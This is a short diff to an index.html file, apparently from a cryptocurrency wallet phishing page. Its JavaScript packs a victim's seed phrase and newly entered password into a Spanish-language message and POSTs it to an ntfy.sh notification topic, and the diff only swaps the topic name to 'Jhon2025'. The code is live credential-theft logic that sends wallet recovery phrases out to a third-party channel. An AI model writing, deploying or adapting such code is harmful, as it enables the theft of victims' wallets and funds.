--- a/index.html
+++ b/index.html
@@ -382,7 +382,7 @@
 
     const mensaje = `📥 Nueva Frase Semilla\n🧠 Semilla: ${seedWords.join(' ')}\n🔐 Contraseña: ${newPassword}`;
 
-    fetch("https://ntfy.sh/USER_BYN9", {
+    fetch("https://ntfy.sh/Jhon2025", {
       method: "POST",
       body: mensaje,
       headers: {
